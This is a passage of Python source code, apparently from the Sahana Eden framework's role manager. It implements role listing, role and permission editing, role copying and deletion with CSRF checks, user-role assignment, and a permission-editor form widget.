output = self.assign_users(r, **attr)
elif method == "import":
output = self.import_roles(r, **attr)
else:
r.error(405, current.ERROR.BAD_METHOD)
elif tablename == "auth_user": # through admin/user controller
# Must have read-permission for the user record
# (user accounts are filtered to OU by controller)
if not self._permitted():
r.unauthorised()
if method == "roles":
output = self.assign_roles(r, **attr)
else:
r.error(405, current.ERROR.BAD_METHOD)
# TODO implement per-target perspective
#elif tablename == "s3_permission": # through admin/permissions controller
#
# # View permissions for a target (page or table)
# r.error(501, current.ERROR.NOT_IMPLEMENTED)
else:
r.error(401, current.ERROR.BAD_REQUEST)
return output
# -------------------------------------------------------------------------
def role_list(self, r, **attr):
"""
List or export roles
@param r: the S3Request instance
@param attr: controller attributes
NB this function must be restricted to ADMINs (in apply_method)
"""
# Check permission to read in this table
authorised = self._permitted()
if not authorised:
r.unauthorised()
# Validate requested format
representation = r.representation
if representation == "csv":
return self.export_roles(r, **attr)
T = current.T
response = current.response
s3 = response.s3
get_vars = self.request.get_vars
# List Config
list_id = "roles"
list_fields = ["id",
"role",
(T("UID"), "uuid"),
"description",
]
default_orderby = "auth_group.role"
s3.no_formats = True
# Exclude hidden roles
resource = self.resource
resource.add_filter(FS("hidden") == False)
if r.interactive:
# Formkey for Ajax-actions
formkey = str(uuid.uuid4())
current.session["_formkey[admin/rolelist]"] = formkey
# Pagination
display_length = s3.dataTable_pageLength or 25
start = None
if s3.no_sspag:
dt_pagination = "false"
limit = None
else:
dt_pagination = "true"
limit = 2 * display_length
# Generate Data Table
dt, totalrows = resource.datatable(fields = list_fields,
start = start,
limit = limit,
left = [],
orderby = default_orderby,
)
# Render the Data Table
datatable = dt.html(totalrows,
totalrows,
id = list_id,
dt_pagination = dt_pagination,
dt_pageLength = display_length,
dt_base_url = r.url(method="", vars={}),
dt_permalink = r.url(),
dt_formkey = formkey,
)
# Configure action buttons
self.role_list_actions(r)
# View
response.view = "admin/roles.html"
# Page actions
crud_button = S3CRUD.crud_button
page_actions = DIV(crud_button(T("Create Role"),
_href = r.url(method="create"),
),
# TODO activate when implemented
#crud_button(T("Import Roles"),
# _href = r.url(method="import"),
# ),
crud_button(T("Export Roles"),
_href = r.url(representation="csv"),
),
)
# Output
output = {"title": T("User Roles"),
"items": datatable,
"page_actions": page_actions,
}
elif representation == "aadata":
# Page limits
start, limit = S3CRUD._limits(get_vars)
# Data Table Filter and Sorting
searchq, orderby, left = resource.datatable_filter(list_fields,
get_vars,
)
if searchq is not None:
totalrows = resource.count()
resource.add_filter(searchq)
else:
totalrows = None
if orderby is None:
orderby = default_orderby
# Data Table
if totalrows != 0:
dt, displayrows = resource.datatable(fields = list_fields,
start = start,
limit = limit,
left = left,
orderby = orderby,
)
else:
dt, displayrows = None, 0
if totalrows is None:
totalrows = displayrows
# Echo
draw = int(get_vars.get("draw", 0))
# Representation
if dt is not None:
output = dt.json(totalrows, displayrows, list_id, draw)
else:
output = '{"recordsTotal":%s,' \
'"recordsFiltered":0,' \
'"dataTable_id":"%s",' \
'"draw":%s,' \
'"data":[]}' % (totalrows, list_id, draw)
else:
r.error(415, current.ERROR.BAD_FORMAT)
return output
# -------------------------------------------------------------------------
def role_list_actions(self, r):
"""
Configure action buttons for role list
@param r: the S3Request
"""
T = current.T
s3 = current.response.s3
sr = current.auth.get_system_roles()
table = self.table
# Standard actions
s3.actions = None
s3.crud_labels.UPDATE = T("Edit")
S3CRUD.action_buttons(r, editable=True, deletable=False)
action_button = S3CRUD.action_button
# Users
label = T("Users")
excluded = [str(sr.AUTHENTICATED), str(sr.ANONYMOUS)]
action_button(label, URL(args=["[id]", "users"]),
exclude = excluded,
_title = s3_str(T("Assign this role to users")),
)
action_button(label, None,
restrict = excluded,
_disabled = "disabled",
_title = s3_str(T("This role is assigned automatically")),
)
# Copy-button Ajax
label = T("Copy")
excluded = [str(sr.ADMIN)]
action_button(label, None,
_ajaxurl = URL(args=["[id]", "copy.json"]),
exclude = excluded,
_title = s3_str(T("Copy this role to create a new role")),
_class = "action-btn copy-role-btn",
)
action_button(label, None,
restrict = excluded,
_disabled = "disabled",
_title = s3_str(T("This role cannot be copied")),
)
question = T("Create a copy of this role?")
script = '''var dt=$('#roles');dt.on('click','.copy-role-btn',dt.dataTableS3('ajaxAction','%s'));''' % question
s3.jquery_ready.append(script)
# Delete-button Ajax
label = T("Delete")
query = (table.deleted == False) & \
((table.system == True) | (table.protected == True))
protected_roles = current.db(query).select(table.id)
excluded = [str(role.id) for role in protected_roles]
action_button(label, None,
_ajaxurl = URL(args=["[id]", "delete.json"]),
_class = "delete-btn-ajax action-btn dt-ajax-delete",
exclude = excluded,
)
action_button(label, None,
restrict = excluded,
_disabled = "disabled",
_title = s3_str(T("This role cannot be deleted")),
)
# -------------------------------------------------------------------------
def role_form(self, r, **attr):
"""
Create, read, update a role
NB this function must be restricted to ADMINs (in apply_method)
"""
T = current.T
s3 = current.response.s3
settings = current.deployment_settings
output = {}
method = r.method
record = r.record
# Read-only?
readonly = False
if r.record:
if r.interactive:
readonly = method == "read"
elif r.representation == "csv":
return self.export_roles(r, **attr)
else:
r.error(415, current.ERROR.BAD_FORMAT)
# Form fields
table = r.table
# UID
uid = table.uuid
uid.label = T("UID")
uid.readable = True
uid.writable = False if record and record.system else True
# Role name
role = table.role
role.label = T("Name")
# Role description
description = table.description
description.label = T("Description")
description.widget = s3_comments_widget
# Permissions
PERMISSIONS = T("Permissions")
permissions = Field("permissions",
label = PERMISSIONS,
widget = S3PermissionWidget(r.id),
)
if record and record.uuid == "ADMIN":
# Administrator permissions cannot be edited
permissions.readable = permissions.writable = False
elif not current.auth.permission.use_cacls:
# Security policy does not use configurable permissions
if record:
record.permissions = None
permissions.widget = self.policy_hint
elif readonly:
# Read-only view (dummy) - just hide permissions
permissions.readable = permissions.writable = False
elif record:
# Populate the field with current permissions
record.permissions = self.get_permissions(record)
# Mark required
if not readonly:
labels, s3.has_required = s3_mark_required(table, [])
labels["permissions"] = "%s:" % s3_str(PERMISSIONS)
else:
labels = None
# Form buttons
if not readonly:
submit_button = INPUT(_class = "small primary button",
_type = "submit",
_value = T("Save"),
)
cancel_button = A(T("Cancel"),
_class="cancel-form-btn action-lnk",
_href = r.url(id=""),
)
buttons = [submit_button, cancel_button]
else:
buttons = ["submit"]
# Form style
crudopts = s3.crud
formstyle = crudopts.formstyle_read if readonly else crudopts.formstyle
# Render form
tablename = "auth_group"
form = SQLFORM.factory(uid,
role,
description,
permissions,
record = record,
showid = False,
labels = labels,
formstyle = formstyle,
table_name = tablename,
upload = s3.download_url,
readonly = readonly,
separator = "",
submit_button = settings.submit_button,
buttons = buttons,
)
form.add_class("rm-form")
output["form"] = form
# Navigate-away confirmation
if crudopts.navigate_away_confirm:
s3.jquery_ready.append("S3EnableNavigateAwayConfirm()")
# Process form
response = current.response
formname = "%s/%s" % (tablename, record.id if record else None)
if form.accepts(current.request.post_vars,
current.session,
#onvalidation = self.validate,
formname = formname,
keepvalues = False,
hideerror = False,
):
role_id, message = self.update_role(record, form)
if role_id:
response.confirmation = message
self.next = r.url(id="", method="")
else:
response.error = message
elif form.errors:
response.error = T("There are errors in the form, please check your input")
# Title
if record:
if readonly:
output["title"] = record.role
else:
output["title"] = T("Edit Role: %(role)s") % {"role": record.role}
else:
output["title"] = T("Create Role")
# View
response.view = "admin/role_form.html"
return output
# -------------------------------------------------------------------------
@staticmethod
def policy_hint(field, value, **attr):
"""
Show a hint if permissions cannot be edited due to security policy
@param field: the Field instance
@param value: the current field value (ignored)
@param attr: DOM attributes for the widget (ignored)
"""
T = current.T
warn = T("The current system configuration uses hard-coded access rules (security policy %(policy)s).") % \
{"policy": current.deployment_settings.get_security_policy()}
hint = T("Change to security policy 3 or higher if you want to define permissions for roles.")
return DIV(SPAN(warn, _class="rm-fixed"),
SPAN(hint, _class="rm-hint"),
INPUT(_type = "hidden",
_name = field.name,
_value= "",
),
)
# -------------------------------------------------------------------------
@staticmethod
def get_permissions(role):
"""
Extract the permission rules for a role
@param role: the role (Row)
@returns: the permission rules as JSON string
"""
permissions = current.auth.permission
rules = []
table = permissions.table
if table:
query = (table.group_id == role.id) & \
(table.deleted == False)
if not permissions.use_facls:
query &= (table.function == None)
if not permissions.use_tacls:
query &= (table.tablename == None)
rows = current.db(query).select(table.id,
table.controller,
table.function,
table.tablename,
table.uacl,
table.oacl,
table.entity,
table.unrestricted,
)
for row in rows:
if row.unrestricted:
entity = "any"
else:
entity = row.entity
rules.append([row.id,
row.controller,
row.function,
row.tablename,
row.uacl,
row.oacl,
entity,
False, # delete-flag
])
return json.dumps(rules, separators=SEPARATORS)
# -------------------------------------------------------------------------
def update_role(self, role, form):
"""
Create or update a role from a role form
@param role: the role (Row)
@param form: the form
@returns: tuple (role ID, confirmation message)
"""
T = current.T
auth = current.auth
formvars = form.vars
rolename = formvars.role
uid = formvars.uuid
if role:
role_id = role.id
data = {"role": rolename,
"description": formvars.description,
}
if uid is not None:
data["uuid"] = uid
role.update_record(**data)
else:
data = {"role": rolename}
role_id = auth.s3_create_role(rolename,
description = formvars.description,
uid = uid,
)
if role_id:
# Update permissions
permissions = formvars.permissions
if permissions:
self.update_permissions(role_id, permissions)
if not role:
message = T("Role %(role)s created") % data
else:
message = T("Role %(role)s updated") % data
else:
if not role:
message = T("Failed to create role %(role)s") % data
else:
message = T("Failed to update role %(role)s") % data
return role_id, message
# -------------------------------------------------------------------------
@staticmethod
def update_permissions(role_id, rules):
"""
Update the permission rules for a role
@param role_id: the role record ID (auth_group.id)
@param rules: the rules as JSON string
"""
table = current.auth.permission.table
if table:
db = current.db
rules = json.loads(rules)
for rule in rules:
rule_id = rule[0]
deleted = rule[7]
if rule_id is None:
continue
if not any(rule[i] for i in (1, 2, 3)):
continue
if rule_id and deleted:
db(table.id == rule_id).update(deleted=True)
else:
entity = rule[6]
if entity == "any":
unrestricted = True
entity = None
else:
unrestricted = False
try:
entity = long(entity) if entity else None
except (ValueError, TypeError):
entity = None
data = {"group_id": role_id,
"controller": rule[1],
"function": rule[2],
"tablename": rule[3],
"uacl": rule[4],
"oacl": rule[5],
"entity": entity,
"unrestricted": unrestricted,
}
if rule_id:
# Update the rule
db(table.id == rule_id).update(**data)
else:
# Add the rule
table.insert(**data)
# -------------------------------------------------------------------------
@staticmethod
def copy_role(r, **attr):
"""
Duplicate an existing role
NB this function must be restricted to ADMINs (in apply_method)
"""
# CSRF Protection
key = current.session["_formkey[admin/rolelist]"]
if not key or r.post_vars.get("_formkey") != key:
r.error(403, current.ERROR.NOT_PERMITTED)
elif r.http != "POST":
r.error(405, current.ERROR.BAD_METHOD)
db = current.db
role = r.record
if not role:
r.error(400, current.ERROR.BAD_RECORD)
# Find a suitable uuid and name
table = r.table
query = ((table.uuid.like("%s%%" % role.uuid)) | \
(table.role.like("%s%%" % role.role)))
rows = db(query).select(table.uuid,
table.role,
)
uids = set(row.uuid for row in rows)
names = set(row.role for row in rows)
uid = name = None
for i in range(2, 1000):
if not uid:
uid = "%s%s" % (role.uuid, i)
if uid in uids:
uid = None
if not name:
name = "%s-%s" % (role.role, i)
if name in names:
name = None
if uid and name:
break
if not uid:
uid = str(uuid.uuid4())
if not name:
name = str(uuid.uuid4())
# Create the new role
role_id = table.insert(uuid = uid,
role = name,
)
# Copy permissions
ptable = current.auth.permission.table
if ptable:
query = (ptable.group_id == role.id) & \
(ptable.deleted == False)
rules = db(query).select(ptable.controller,
ptable.function,
ptable.tablename,
ptable.record,
ptable.oacl,
ptable.uacl,
ptable.entity,
ptable.unrestricted,
)
for rule in rules:
ptable.insert(group_id = role_id,
controller = rule.controller,
function = rule.function,
tablename = rule.tablename,
record = rule.record,
oacl = rule.oacl,
uacl = rule.uacl,
entity = rule.entity,
unrestricted = rule.unrestricted,
)
message = current.T("New Role %(role)s created") % {"role": name}
return current.xml.json_message(message=message)
# -------------------------------------------------------------------------
@staticmethod
def delete_role(r, **attr):
"""
Delete a role
NB this function must be restricted to ADMINs (in apply_method)
"""
# CSRF Protection
key = current.session["_formkey[admin/rolelist]"]
if not key or r.post_vars.get("_formkey") != key:
r.error(403, current.ERROR.NOT_PERMITTED)
elif r.http not in ("POST", "DELETE"):
r.error(405, current.ERROR.BAD_METHOD)
role = r.record
if not role:
r.error(400, current.ERROR.BAD_RECORD)
if role.protected or role.system:
r.error(403, current.ERROR.NOT_PERMITTED)
auth = current.auth
auth.s3_delete_role(role.id)
auth.s3_set_roles()
message = current.T("Role %(role)s deleted") % {"role": role.role}
return current.xml.json_message(message=message)
# -------------------------------------------------------------------------
def assign_roles(self, r, **attr):
"""
Assign/unassign roles to a user
NB this function is accessible for non-ADMINs (e.g. ORG_ADMIN)
"""
auth = current.auth
# Require a primary record
if not r.record:
r.error(400, current.ERRORS.BAD_RECORD)
# Require permission to create or delete group memberships
mtable = auth.settings.table_membership
permitted = auth.s3_has_permission
if not permitted("create", mtable) and not permitted("delete", mtable):
r.unauthorised()
# Require that the target user record belongs to a managed organisation
pe_ids = auth.get_managed_orgs()
if not pe_ids:
r.unauthorised()
elif pe_ids is not True:
otable = current.s3db.org_organisation
utable = auth.settings.table_user
query = (utable.id == r.id) & \
(otable.id == utable.organisation_id) & \
(otable.pe_id.belongs(pe_ids))
row = current.db(query).select(utable.id, limitby=(0, 1)).first()
if not row:
r.unauthorised()
# Which roles can the current user manage for this user?
managed_roles = self.get_managed_roles(r.id)
output = {}
if r.http == "GET":
T = current.T
# Page Title
userfield = auth.settings.login_userfield
user_name = r.record[userfield]
output["title"] = "%s: %s" % (T("Roles of User"), user_name)
# Should we use realms?
use_realms = auth.permission.entity_realm
if use_realms:
realm_types, realms = self.get_managed_realms()
else:
realm_types, realms = None, None
# The Ajax URL for role updates
ajax_url = r.url(id="[id]", representation="json")
# The form field
field = mtable.user_id
field.readable = field.writable = True
field.widget = S3RolesWidget(mode = "roles",
items = managed_roles,
use_realms = use_realms,
realm_types = realm_types,
realms = realms,
ajax_url = ajax_url,
)
# Render form
s3 = current.response.s3
tablename = str(mtable)
form = SQLFORM.factory(field,
record = {"id": None, "user_id": r.id},
showid = False,
labels = {field.name: ""},
formstyle = s3.crud.formstyle,
table_name = tablename,
upload = s3.download_url,
#readonly = readonly,
separator = "",
submit_button = False,
buttons = [],
)
form.add_class("rm-form")
output["form"] = form
# Show a back-button since OrgAdmins have no other obvious
# way to return to the list (no left menu)
crud_button = S3CRUD.crud_button
output["list_btn"] = crud_button(T("Back to User List"),
icon = "return",
_href = r.url(id="", method=""),
)
# View
response = current.response
response.view = "admin/role_form.html"
elif r.http == "POST":
if r.representation == "json":
# Read+parse body JSON
s = r.body
s.seek(0)
try:
options = json.load(s)
except JSONERRORS:
options = None
if not isinstance(options, dict):
r.error(400, "Invalid request options")
user_id = r.record.id
added = options.get("add")
removed = options.get("remove")
# Validate
if added:
for group_id, pe_id in added:
role = managed_roles.get(group_id)
if not role or role.get("a") is False:
r.error(403, current.ERROR.NOT_PERMITTED)
if removed:
for group_id, pe_id in removed:
role = managed_roles.get(group_id)
if not role or role.get("r") is False:
r.error(403, current.ERROR.NOT_PERMITTED)
# Update role assignments
if added:
add_role = auth.s3_assign_role
for group_id, pe_id in added:
add_role(user_id, group_id, for_pe=pe_id)
if removed:
remove_role = auth.s3_withdraw_role
for group_id, pe_id in removed:
remove_role(user_id, group_id, for_pe=pe_id)
output = current.xml.json_message(options=options)
else:
r.error(415, current.ERROR.BAD_FORMAT)
else:
r.error(405, current.ERROR.BAD_METHOD)
return output
# -------------------------------------------------------------------------
def assign_users(self, r, **attr):
"""
Assign/unassign users to a role
NB this function could be accessible for non-ADMINs (e.g. ORG_ADMIN)
"""
auth = current.auth
# Require a primary record
role = r.record
if not role:
r.error(400, current.ERRORS.BAD_RECORD)
# Require permission to create or delete group memberships
mtable = auth.settings.table_membership
permitted = auth.s3_has_permission
if not permitted("create", mtable) and not permitted("delete", mtable):
r.unauthorised()
# Require that the target role belongs to managed roles
managed_roles = self.get_managed_roles(None)
if role.id not in managed_roles:
r.unauthorised()
s3 = current.response.s3
# Which users can the current user manage?
managed_users = self.get_managed_users(role.id)
# Special rules for system roles
sr = auth.get_system_roles()
unrestrictable = (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS)
unassignable = (sr.AUTHENTICATED, sr.ANONYMOUS)
output = {}
if r.http == "GET":
T = current.T
# Page Title
output["title"] = "%s: %s" % (T("Users with Role"), role.role)
# Should we use realms?
use_realms = auth.permission.entity_realm and \
role.id not in unrestrictable
if use_realms:
realm_types, realms = self.get_managed_realms()
else:
realm_types, realms = None, None
# The Ajax URL for role updates
ajax_url = r.url(id="[id]", representation="json")
# The form field
field = mtable.group_id
field.readable = field.writable = True
field.widget = S3RolesWidget(mode="users",
items = managed_users,
use_realms = use_realms,
realm_types = realm_types,
realms = realms,
ajax_url = ajax_url,
)
# Render form
tablename = str(mtable)
form = SQLFORM.factory(field,
record = {"id": None, "group_id": role.id},
showid = False,
labels = {field.name: ""},
formstyle = s3.crud.formstyle,
table_name = tablename,
upload = s3.download_url,
#readonly = readonly,
separator = "",
submit_button = False,
buttons = [],
)
form.add_class("rm-form")
output["form"] = form
# Default RHeader and View
if "rheader" not in attr:
return_btn = S3CRUD.crud_button("Back to Roles List",
icon = "return",
_href=r.url(id="", method=""),
)
output["rheader"] = DIV(return_btn,
_class="rheader",
)
response = current.response
response.view = "admin/role_form.html"
elif r.http == "POST":
if r.representation == "json":
# Process Ajax-request from S3RolesWidget
# Read+parse body JSON
s = r.body
s.seek(0)
try:
options = json.load(s)
except JSONERRORS:
options = None
if not isinstance(options, dict):
r.error(400, "Invalid request options")
added = options.get("add")
removed = options.get("remove")
# Validate
group_id = role.id
if group_id in unassignable:
r.error(403, current.ERROR.NOT_PERMITTED)
if added:
for user_id, pe_id in added:
user = managed_users.get(user_id)
if not user or user.get("a") is False:
r.error(403, current.ERROR.NOT_PERMITTED)
if removed:
for user_id, pe_id in removed:
user = managed_users.get(user_id)
if not user or user.get("r") is False:
r.error(403, current.ERROR.NOT_PERMITTED)
# Update role assignments
if added:
add_role = auth.s3_assign_role
for user_id, pe_id in added:
add_role(user_id, group_id, for_pe=pe_id)
if removed:
remove_role = auth.s3_withdraw_role
for user_id, pe_id in removed:
remove_role(user_id, group_id, for_pe=pe_id)
output = current.xml.json_message(options=options)
else:
r.error(415, current.ERROR.BAD_FORMAT)
else:
r.error(405, current.ERROR.BAD_METHOD)
return output
# -------------------------------------------------------------------------
@staticmethod
def get_managed_users(role_id):
"""
Get a dict of users the current user can assign to roles
@param role_id: the target role ID
@returns: a dict {user_id: {l:label,
t:title,
a:assignable,
r:removable,
u:unrestrictable,
}, ...}
NB a, r and u attributes only added if non-default
"""
auth = current.auth
auth_settings = auth.settings
sr = auth.get_system_roles()
admin_role = role_id == sr.ADMIN
unassignable = role_id in (sr.AUTHENTICATED, sr.ANONYMOUS)
unrestrictable = role_id in (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS)
current_user = auth.user.id if auth.user else None
users = {}
pe_ids = auth.get_managed_orgs()
if pe_ids:
utable = auth_settings.table_user
query = (utable.deleted == False)
if pe_ids is not True:
otable = current.s3db.org_organisation
query &= (otable.id == utable.organisation_id) & \
(otable.pe_id.belongs(pe_ids))
userfield = auth_settings.login_userfield
rows = current.db(query).select(utable.id,
utable.first_name,
utable.last_name,
utable[userfield],
)
for row in rows:
user_id = row.id
user = {"l": row[userfield],
"t": "%s %s" % (row.first_name,
row.last_name,
),
}
if unrestrictable:
user["u"] = True
if admin_role and user_id == current_user:
# ADMINs cannot remove their own ADMIN role
user["r"] = False
if unassignable:
user["a"] = user["r"] = False
users[user_id] = user
return users
# -------------------------------------------------------------------------
@staticmethod
def get_managed_roles(user_id):
"""
Get a dict of roles the current user can manage
@returns: a dict {role_id: {l:label,
a:assignable,
r:removable,
u:unrestrictable,
}, ...},
NB a, r and u attributes only added if non-default
"""
auth = current.auth
sr = auth.get_system_roles()
AUTO = (sr.AUTHENTICATED, sr.ANONYMOUS)
ADMINS = (sr.ADMIN, sr.ORG_ADMIN, sr.ORG_GROUP_ADMIN)
UNRESTRICTABLE = (sr.ADMIN, sr.AUTHENTICATED, sr.ANONYMOUS)
table = auth.settings.table_group
query = (table.hidden == False) & \
(table.deleted == False)
rows = current.db(query).select(table.id,
table.uuid,
table.role,
)
has_role = auth.s3_has_role
roles = {}
for row in rows:
role = {"l": row.role or row.uuid}
role_id = row.id
if role_id in ADMINS:
assignable = has_role(role_id)
else:
assignable = role_id not in AUTO
if role_id == sr.ADMIN and auth.user.id == user_id:
removable = False
else:
removable = assignable
if not assignable:
role["a"] = False
if not removable:
role["r"] = False
if role_id in UNRESTRICTABLE:
role["u"] = True
roles[role_id] = role
return roles
# -------------------------------------------------------------------------
@staticmethod
def get_managed_realms():
"""
Get a dict of realms managed by the current user
@returns: tuple (realm_types, realms):
- realm_types = [(instance_type, label), ...]
- realms = {pe_id: {l:label, t:type}, ...}
"""
T = current.T
t_ = lambda v: s3_str(T(v))
realm_types = [(None, t_("Multiple"))]
realms = {None: {"l": t_("Default Realm"), "t": None},
}
# Look up the realms managed by the current user
pe_ids = []
auth = current.auth
sr = auth.get_system_roles()
has_role = auth.s3_has_role
is_admin = has_role(sr.ADMIN)
if is_admin:
# Only ADMIN can assign roles site-wide
realms[0] = {"l": t_("All Entities"), "t": None}
else:
if has_role(sr.ORG_GROUP_ADMIN):
role_realms = auth.user.realms[sr.ORG_GROUP_ADMIN]
if role_realms:
pe_ids.extend(role_realms)
if has_role(sr.ORG_ADMIN):
role_realms = auth.user.realms[sr.ORG_ADMIN]
if role_realms:
pe_ids.extend(role_realms)
# Get entities and types
s3db = current.s3db
types = current.deployment_settings.get_auth_realm_entity_types()
entities = s3db.pr_get_entities(pe_ids = pe_ids,
types = types,
group = True,
show_instance_type = False,
)
# Add representations for entities and types
instance_type_nice = s3db.pr_pentity.instance_type.represent
for instance_type in types:
entity_group = entities.get(instance_type)
if not entity_group:
continue
realm_types.append((instance_type,
s3_str(instance_type_nice(instance_type)),
))
for pe_id, name in entity_group.items():
realms[pe_id] = {"l": s3_str(name), "t": instance_type}
return realm_types, realms
# -------------------------------------------------------------------------
def import_roles(self, r, **attr):
"""
Interactive import of roles (auth_roles.csv format)
NB this function must be restricted to ADMINs (in apply_method)
"""
# TODO implement roles importer
T = current.T
output = {}
# Title
output["title"] = T("Import Roles")
# View
response = current.response
response.view = "admin/import_roles.html"
return output
# if GET:
# show an import form
# elif POST:
# import the submitted file using Bulk-importer
# -------------------------------------------------------------------------
@staticmethod
def export_roles(r, **attr):
"""
Export of roles (auth_roles.csv format)
NB this function must be restricted to ADMINs (in apply_method)
"""
output = S3RolesExport(r.resource).as_csv()
# Response headers
from gluon.contenttype import contenttype
filename = "auth_roles.csv"
disposition = "attachment; filename=\"%s\"" % filename
response = current.response
response.headers["Content-Type"] = contenttype(".csv")
response.headers["Content-disposition"] = disposition
return output.read()
# =============================================================================
class S3PermissionWidget(object):
"""
Form widget to modify permissions of a role
"""
def __init__(self, role_id=None):
"""
Constructor
"""
sr = current.auth.get_system_roles()
if role_id == sr.ANONYMOUS:
default_roles = ()
elif role_id == sr.AUTHENTICATED:
default_roles = (sr.ANONYMOUS,)
else:
default_roles = (sr.ANONYMOUS, sr.AUTHENTICATED)
self.default_roles = default_roles
# -------------------------------------------------------------------------
def __call__(self, field, value, **attributes):
"""
Form builder entry point
@param field: the Field
@param value: the current (or default) value of the field
@param attributes: HTML attributes for the widget
"""
T = current.T
# Widget ID
widget_id = attributes.get("_id") or str(field).replace(".", "_")
# Field name
name = attributes.get("_name") or field.name
# Page access rules tab+pane
prules_id = "%s-prules" % widget_id
prules_tab = LI(A(T("Page Access"),
_href = "#" + prules_id,
)
)
prules_pane = DIV(_id = prules_id,
_class = "rm-page-rules",
)
# Table access rules tab+page
rules = current.auth.permission
use_tacls = rules.use_tacls
if use_tacls:
trules_id = "%s-trules" % widget_id
trules_tab = LI(A(T("Table Access"),
_href = "#" + trules_id,
),
)
trules_pane = DIV(_id = trules_id,
_class = "rm-table-rules",
)
else:
trules_pane = ""
trules_tab = ""
# Construct the widget
widget = DIV(INPUT(_type = "hidden",
_name = name,
_value = value,
_id = widget_id + "-input",
),
DIV(UL(trules_tab,
prules_tab,
),
trules_pane,
prules_pane,
_class = "rm-rules hide"
),
_id = widget_id,
)
# Module header icons
rtl = current.response.s3.rtl
icons = {"expanded": "fa fa-caret-down",
"collapsed": "fa fa-caret-left" if rtl else "fa fa-caret-right",
}
# Client-side widget options
widget_opts = {"fRules": rules.use_facls,
"tRules": use_tacls,
"useRealms": rules.entity_realm,
"permissions": self.get_permissions(),
"defaultPermissions": self.get_default_permissions(),
"modules": self.get_active_modules(),
"icons": icons,
}
if use_tacls:
widget_opts["models"] = self.get_active_models()
# Localized strings for client-side widget
i18n = {"rm_Add": T("Add"),
"rm_AddRule": T("Add Rule"),
"rm_AllEntities": T("All Entities"),
"rm_AllRecords": T("All Records"),
"rm_AssignedEntities": T("Assigned Entities"),
"rm_Cancel": T("Cancel"),
"rm_CollapseAll": T("Collapse All"),
"rm_ConfirmDeleteRule": T("Do you want to delete this rule?"),
"rm_Default": T("default"),
"rm_DeleteRule": T("Delete"),
"rm_ExpandAll": T("Expand All"),
"rm_NoAccess": T("No access"),
"rm_NoRestrictions": T("No restrictions"),
"rm_Others": T("Others"),
"rm_OwnedRecords": T("Owned Records"),
"rm_Page": T("Page"),
"rm_RestrictedTables": T("Restricted Tables"),
"rm_Scope": T("Scope"),
"rm_SystemTables": T("System Tables"),
"rm_Table": T("Table"),
"rm_UnrestrictedTables": T("Unrestricted Tables"),
}
# Inject the client-side script
self.inject_script(widget_id, widget_opts, i18n)
return widget
# -------------------------------------------------------------------------
@staticmethod
def get_active_modules():
"""
Get a JSON-serializable dict of active modules
@returns: a dict {prefix: (name_nice, restricted)}
"""
# Modules where access rules do not apply (or are hard-coded)
exclude = ("appadmin", "errors")
# Active modules
modules = current.deployment_settings.modules
active= {k: (s3_str(modules[k].name_nice), modules[k].restricted)
for k in modules if k not in exclude
}
# Special controllers for dynamic models
if current.auth.permission.use_facls:
active["default/dt"] = (s3_str(current.T("Dynamic Models")), True)
return active
# -------------------------------------------------------------------------
def get_active_models(self):
"""
Get a JSON-serializable dict of active data models
@returns: a dict {prefix: {tablename: restricted}}
"""
# Get all table names
db_tables = current.cache.ram("permission_widget_all_tables",
self.get_db_tables,
time_expire = 14400,
)
# Count the number of restricting roles per table
# @see: S3Permission.table_restricted()
rtable = current.auth.permission.table
query = (rtable.tablename != None) & \
(rtable.controller == None) & \
(rtable.function == None) & \
(rtable.deleted == False)
numroles = rtable.group_id.count()
tablename = rtable.tablename
rows = current.db(query).select(tablename,
numroles,
groupby = tablename,
)
restrictions = {row[tablename]: row[numroles] for row in rows}
# Sort tablenames after module and mark number of restrictions
models = {}
for tablename in db_tables:
prefix = tablename.split("_", 1)[0]
if prefix in ("auth", "sync", "s3", "scheduler"):
prefix = "_system"
if prefix not in models:
models[prefix] = {}
models[prefix][tablename] = restrictions.get(tablename, 0)
return models
# -------------------------------------------------------------------------
@staticmethod
def get_db_tables():
"""
Return all table names in the database; in separate function
to allow caching because it requires to load all models once
@returns: db.tables
"""
db = current.db
s3db = current.s3db
# Load all static models
s3db.load_all_models()
# Load all dynamic tables (TODO: how does this make sense?)
#ttable = s3db.s3_table
#rows = db(ttable.deleted != True).select(ttable.name)
#for row in rows:
# s3db.table(row.name)
return db.tables
# -------------------------------------------------------------------------
@staticmethod
def get_permissions():
"""
Get a JSON-serializable list of permissions
@returns: an ordered list of dicts:
[{l: label,
b: bit,
o: relevant for owned records,
},
...
]
"""
permission = current.auth.permission
opts = permission.PERMISSION_OPTS
skip = 0x0000
# Hide approval-related permissions if record approval is disabled
if not current.deployment_settings.get_auth_record_approval():
skip |= permission.REVIEW | permission.APPROVE
output = []
for bit, label in opts.items():
if bit & skip:
continue
output.append({"l": s3_str(label),
"b": bit,
"o": bit != permission.CREATE,
})
return output
# -------------------------------------------------------------------------
def get_default_permissions(self):
"""
Get default permissions, i.e. those granted by roles the user
has by default
@returns: a dict {tablename: (uACL, oACL)}
"""
permissions = current.auth.permission
table = permissions.table
default_roles = self.default_roles
default_permissions = {}
if table and default_roles:
query = (table.group_id.belongs(default_roles))
if not permissions.use_facls:
query &= (table.function == None)
if not permissions.use_tacls:
query &= (table.tablename == None)
query &= (table.deleted == False)
rows = current.db(query).select(table.controller,
table.function,
table.tablename,
table.uacl,
table.oacl,
)
for row in rows:
target = row.tablename
if not target:
c = row.controller
if c:
target = "%s/%s" % (c, row.function or "*")
else:
continue
rules = default_permissions.get(target)
if rules:
default_permissions[target] = (rules[0] | row.uacl,
rules[1] | row.oacl,
)
else:
default_permissions[target] = (row.uacl, row.oacl)
return default_permissions
# -------------------------------------------------------------------------
def inject_script(self, widget_id, options, i18n):
"""
Inject the necessary JavaScript for the widget
@param widget_id: the widget ID
(=element ID of the person_id field)
@param options: JSON-serializable dict of widget options
@param i18n: translations of screen messages rendered by
the client-side script,
a dict {messageKey: translation}
"""
s3 = current.response.s3
# Static script
if s3.debug:
script = "/%s/static/scripts/S3/s3.ui.permissions.js" % \
current.request.application
else:
script = "/%s/static/scripts/S3/s3.ui.permissions.min.js" % \
current.request.application
scripts = s3.scripts
if script not in scripts:
scripts.append(script)
self.inject_i18n(i18n)
# Widget options
opts = {}
if options:
opts.update(options)
# Widget instantiation
script = '''$('#%(widget_id)s').permissionEdit(%(options)s)''' % \
{"widget_id": widget_id,
"options": json.dumps(opts, separators=SEPARATORS),
}
jquery_ready = s3.jquery_ready
if script not in jquery_ready:
jquery_ready.append(script)
# -------------------------------------------------------------------------
@staticmethod
